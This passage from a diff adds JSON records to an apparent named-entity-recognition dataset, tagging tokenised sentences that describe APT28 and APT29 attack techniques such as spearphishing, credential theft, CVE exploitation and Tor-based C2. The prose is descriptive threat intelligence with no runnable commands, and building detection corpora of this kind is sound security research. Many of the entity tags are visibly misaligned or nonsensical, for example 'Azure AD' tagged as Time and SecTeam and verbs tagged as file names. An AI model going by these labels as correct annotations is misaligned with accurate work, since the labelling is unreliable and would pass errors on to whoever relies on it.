"a", + "custom", + "algorithm", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "used", + "weaponized", + "Microsoft", + "Word", + "documents", + "abusing", + "the", + "remote", + "template", + "function", + "to", + "retrieve", + "a", + "malicious", + "macro." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-SamFile", + "I-SamFile", + "I-SamFile", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "performed", + "timestomping", + "on", + "victim", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "CVE-2015-1701", + "to", + "access", + "the", + "SYSTEM", + "token", + "and", + "copy", + "it", + "into", + "the", + "current", + "process", + "as", + "part", + "of", + "privilege", + "escalation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "obtained", + "and", + "used", + "open-source", + "tools", + "like", + "Koadic,", + "Mimikatz,", + "and", + "Responder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Once", + "APT28", + "gained", + "access", + "to", + "the", + "DCCC", + "network,", + "the", + "group", + "then", + "proceeded", + "to", + "use", + "that", + "access", + "to", + "compromise", + "the", + "DNC", + "network." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "legitimate", + "credentials", + "to", + "gain", + "initial", + "access,", + "maintain", + "access,", + "and", + "exfiltrate", + "data", + "from", + "a", + "victim", + "network.", + "The", + "group", + "has", + "specifically", + "used", + "credentials", + "stolen", + "through", + "a", + "spearphishing", + "email", + "to", + "login", + "to", + "the", + "DCCC", + "network.", + "The", + "group", + "has", + "also", + "leveraged", + "default", + "manufacturer's", + "passwords", + "to", + "gain", + "initial", + "access", + "to", + "corporate", + "networks", + "via", + "IoT", + "devices", + "such", + "as", + "a", + "VOIP", + "phone,", + "printer,", + "and", + "video", + "decoder." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "I-Purp", + "O", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "hosted", + "phishing", + "domains", + "on", + "free", + "services", + "for", + "brief", + "periods", + "of", + "time", + "during", + "campaigns." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "APT28", + "has", + "performed", + "large-scale", + "scans", + "in", + "an", + "attempt", + "to", + "find", + "vulnerable", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Later", + "implants", + "used", + "by", + "APT28,", + "such", + "as", + "CHOPSTICK,", + "use", + "a", + "blend", + "of", + "HTTP,", + "HTTPS,", + "and", + "other", + "legitimate", + "channels", + "for", + "C2,", + "depending", + "on", + "module", + "configuration." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "newly-created", + "Blogspot", + "pages", + "for", + "credential", + "harvesting", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "a", + "modified", + "and", + "obfuscated", + "version", + "of", + "the", + "reGeorg", + "web", + "shell", + "to", + "maintain", + "persistence", + "on", + "a", + "target's", + "Outlook", + "Web", + "Access", + "(OWA)", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "APT28", + "loader", + "Trojan", + "uses", + "a", + "cmd.exe", + "and", + "batch", + "script", + "to", + "run", + "its", + "payload.", + "The", + "group", + "has", + "also", + "used", + "macros", + "to", + "execute", + "payloads." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "used", + "sticky-keys", + "to", + "obtain", + "unauthenticated,", + "privileged", + "console", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "a", + "compromised", + "global", + "administrator", + "account", + "in", + "Azure", + "AD", + "to", + "backdoor", + "a", + "service", + "principal", + "with", + "`ApplicationImpersonation`", + "rights", + "to", + "start", + "collecting", + "emails", + "from", + "targeted", + "mailboxes;", + "APT29", + "has", + "also", + "used", + "compromised", + "accounts", + "holding", + "`ApplicationImpersonation`", + "rights", + "in", + "Exchange", + "to", + "collect", + "emails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT29", + "used", + "large", + "size", + "files", + "to", + "avoid", + "detection", + "by", + "security", + "solutions", + "with", + "hardcoded", + "size", + "limits." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "hijacked", + "legitimate", + "application-specific", + "startup", + "scripts", + "to", + "enable", + "malware", + "to", + "execute", + "on", + "system", + "startup." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "bypassed", + "UAC." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "leveraged", + "the", + "Microsoft", + "Graph", + "API", + "to", + "perform", + "various", + "actions", + "across", + "Azure", + "and", + "M365", + "environments.", + "They", + "have", + "also", + "utilized", + "AADInternals", + "PowerShell", + "Modules", + "to", + "access", + "the", + "API" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "conducted", + "enumeration", + "of", + "Azure", + "AD", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "can", + "create", + "new", + "users", + "through", + "Azure", + "AD." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-SecTeam" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "residential", + "proxies,", + "including", + "Azure", + "Virtual", + "Machines,", + "to", + "obfuscate", + "their", + "access", + "to", + "victim", + "environments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "gained", + "access", + "to", + "a", + "global", + "administrator", + "account", + "in", + "Azure", + "AD", + "and", + "has", + "used", + "`Service", + "Principal`", + "credentials", + "in", + "Exchange." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "Azure", + "Run", + "Command", + "and", + "Azure", + "Admin-on-Behalf-of", + "(AOBO)", + "to", + "execute", + "code", + "on", + "virtual", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "leveraged", + "compromised", + "high-privileged", + "on-premises", + "accounts", + "synced", + "to", + "Office", + "365", + "to", + "move", + "laterally", + "into", + "a", + "cloud", + "environment,", + "including", + "through", + "the", + "use", + "of", + "Azure", + "AD", + "PowerShell." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "stolen", + "data", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "enrolled", + "their", + "own", + "devices", + "into", + "compromised", + "cloud", + "tenants,", + "including", + "enrolling", + "a", + "device", + "in", + "MFA", + "to", + "an", + "Azure", + "AD", + "environment", + "following", + "a", + "successful", + "password", + "guessing", + "attack", + "against", + "a", + "dormant", + "account." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "created", + "self-signed", + "digital", + "certificates", + "to", + "enable", + "mutual", + "TLS", + "authentication", + "for", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "disabled", + "Purview", + "Audit", + "on", + "targeted", + "accounts", + "prior", + "to", + "stealing", + "emails", + "from", + "Microsoft", + "365", + "tenants." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct", + "B-Purp", + "O", + "I-Org", + "I-Org", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "the", + "meek", + "domain", + "fronting", + "plugin", + "for", + "Tor", + "to", + "hide", + "the", + "destination", + "of", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "Dynamic", + "DNS", + "providers", + "for", + "their", + "malware", + "C2", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "B-Purp", + "B-Org", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "compromised", + "email", + "accounts", + "to", + "further", + "enable", + "phishing", + "campaigns", + "and", + "taken", + "control", + "of", + "dormant", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "multiple", + "layers", + "of", + "encryption", + "within", + "malware", + "to", + "protect", + "C2", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "exploited", + "CVE-2019-19781", + "for", + "Citrix,", + "CVE-2019-11510", + "for", + "Pulse", + "Secure", + "VPNs,", + "CVE-2018-13379", + "for", + "FortiGate", + "VPNs,", + "and", + "CVE-2019-9670", + "in", + "Zimbra", + "software", + "to", + "gain", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "multiple", + "software", + "exploits", + "for", + "common", + "client", + "software,", + "like", + "Microsoft", + "Word,", + "Exchange,", + "and", + "Adobe", + "Reader,", + "to", + "gain", + "code", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "B-Tool", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "exploited", + "CVE-2021-36934", + "to", + "escalate", + "privileges", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "uses", + "compromised", + "residential", + "endpoints", + "as", + "proxies", + "for", + "defense", + "evasion", + "and", + "network", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "compromised", + "identities", + "to", + "access", + "networks", + "via", + "VPNs", + "and", + "Citrix." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "SDelete", + "to", + "remove", + "artifacts", + "from", + "victim", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "embedded", + "an", + "ISO", + "file", + "within", + "an", + "HTML", + "attachment", + "that", + "contained", + "JavaScript", + "code", + "to", + "initiate", + "malware", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "uses", + "compromised", + "residential", + "endpoints,", + "typically", + "within", + "the", + "same", + "ISP", + "IP", + "address", + "range,", + "as", + "proxies", + "to", + "hide", + "the", + "true", + "source", + "of", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "edited", + "the", + "`Microsoft.IdentityServer.Servicehost.exe.config`", + "file", + "to", + "load", + "a", + "malicious", + "DLL", + "into", + "the", + "AD", + "FS", + "process,", + "thereby", + "enabling", + "persistent", + "access", + "to", + "any", + "service", + "federated", + "with", + "AD", + "FS", + "for", + "a", + "user", + "with", + "a", + "specified", + "User", + "Principal", + "Name." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "downloaded", + "additional", + "tools", + "and", + "malware", + "onto", + "compromised", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "ensured", + "web", + "servers", + "in", + "a", + "victim", + "environment", + "are", + "Internet", + "accessible", + "before", + "copying", + "tools", + "or", + "malware", + "to", + "it." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "the", + "`reg", + "save`", + "command", + "to", + "extract", + "LSA", + "secrets", + "offline." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "targets", + "dormant", + "or", + "inactive", + "user", + "accounts,", + "accounts", + "belonging", + "to", + "individuals", + "no", + "longer", + "at", + "the", + "organization", + "but", + "whose", + "accounts", + "remain", + "on", + "the", + "system,", + "for", + "access", + "and", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "various", + "forms", + "of", + "spearphishing", + "attempting", + "to", + "get", + "a", + "user", + "to", + "open", + "attachments,", + "including,", + "but", + "not", + "limited", + "to,", + "malicious", + "Microsoft", + "Word", + "documents,", + ".pdf,", + "and", + ".lnk", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "various", + "forms", + "of", + "spearphishing", + "attempting", + "to", + "get", + "a", + "user", + "to", + "click", + "on", + "a", + "malicous", + "link." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "unique", + "malware", + "in", + "many", + "of", + "their", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "embedded", + "ISO", + "images", + "and", + "VHDX", + "files", + "in", + "HTML", + "to", + "evade", + "Mark-of-the-Web." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "renamed", + "malicious", + "DLLs", + "with", + "legitimate", + "names", + "to", + "appear", + "benign;", + "they", + "have", + "also", + "created", + "an", + "Azure", + "AD", + "certificate", + "with", + "a", + "Common", + "Name", + "that", + "matched", + "the", + "display", + "name", + "of", + "the", + "compromised", + "service", + "principal." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Exp", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "use", + "`mshta`", + "to", + "execute", + "malicious", + "scripts", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "repeated", + "MFA", + "requests", + "to", + "gain", + "access", + "to", + "victim", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "backdoor", + "used", + "by", + "APT29", + "created", + "a", + "Tor", + "hidden", + "service", + "to", + "forward", + "traffic", + "from", + "the", + "Tor", + "client", + "to", + "local", + "ports", + "3389", + "(RDP),", + "139", + "(Netbios),", + "and", + "445", + "(SMB)", + "enabling", + "full", + "remote", + "access", + "from", + "outside", + "the", + "network", + "and", + "has", + "also", + "used", + "TOR." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Idus", + "O", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT29", + "used", + "Kerberos", + "ticket", + "attacks", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "successfully", + "conducted", + "password", + "guessing", + "attacks", + "against", + "a", + "list", + "of", + "mailboxes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "conducted", + "brute", + "force", + "password", + "spray", + "attacks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-OffAct", + "I-Way", + "I-Way", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "encoded", + "PowerShell", + "scripts", + "uploaded", + "to", + "CozyCar", + "installations", + "to", + "download", + "and", + "install", + "SeaDuke." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT29", + "has", + "developed", + "malware", + "variants", + "written", + "in", + "Python." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "installed", + "a", + "run", + "command", + "on", + "a", + "compromised", + "system", + "to", + "enable", + "malware", + "execution", + "on", + "system", + "startup." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "added", + "Registry", + "Run", + "keys", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "collected", + "emails", + "from", + "targeted", + "mailboxes", + "within", + "a", + "compromised", + "Azure", + "AD", + "tenant", + "and", + "compromised", + "Exchange", + "servers,", + "including", + "via", + "Exchange", + "Web", + "Services", + "(EWS)", + "API", + "requests." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "named", + "and", + "hijacked", + "scheduled", + "tasks", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "the", + "`reg", + "save`", + "command", + "to", + "save", + "registry", + "hives." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "used", + "UPX", + "to", + "pack", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "spearphishing", + "emails", + "with", + "an", + "attachment", + "to", + "deliver", + "files", + "with", + "exploits", + "to", + "initial", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "spearphishing", + "with", + "a", + "link", + "to", + "trick", + "victims", + "into", + "clicking", + "on", + "a", + "link", + "to", + "a", + "zip", + "file", + "containing", + "malicious", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "the", + "legitimate", + "mailing", + "service", + "Constant", + "Contact", + "to", + "send", + "phishing", + "e-mails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT29", + "uses", + "stolen", + "tokens", + "to", + "access", + "victim", + "accounts,", + "without", + "needing", + "a", + "password." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "abused", + "misconfigured", + "AD", + "CS", + "certificate", + "templates", + "to", + "impersonate", + "admin", + "users", + "and", + "create", + "additional", + "authentication", + "certificates." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Org", + "I-Org", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "timestomping", + "to", + "alter", + "the", + "Standard", + "Information", + "timestamps", + "on", + "their", + "web", + "shells", + "to", + "match", + "other", + "files", + "in", + "the", + "same", + "directory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "obtained", + "and", + "used", + "a", + "variety", + "of", + "tools", + "including", + "Mimikatz,", + "SDelete,", + "Tor,", + "meek,", + "and", + "Cobalt", + "Strike." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Tool", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "APT29", + "has", + "compromised", + "IT,", + "cloud", + "services,", + "and", + "managed", + "services", + "providers", + "to", + "gain", + "broad", + "access", + "to", + "multiple", + "customers", + "for", + "subsequent", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Idus", + "I-Idus", + "O", + "O", + "I-Org", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "a", + "compromised", + "account", + "to", + "access", + "an", + "organization's", + "VPN", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "conducted", + "widespread", + "scanning", + "of", + "target", + "environments", + "to", + "identify", + "vulnerabilities", + "for", + "exploit." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "registered", + "algorithmically", + "generated", + "Twitter", + "handles", + "that", + "are", + "used", + "for", + "C2", + "by", + "malware,", + "such", + "as", + "HAMMERTOSS.", + "APT29", + "has", + "also", + "used", + "legitimate", + "web", + "services", + "such", + "as", + "Dropbox", + "and", + "Constant", + "Contact", + "in", + "their", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Idus", + 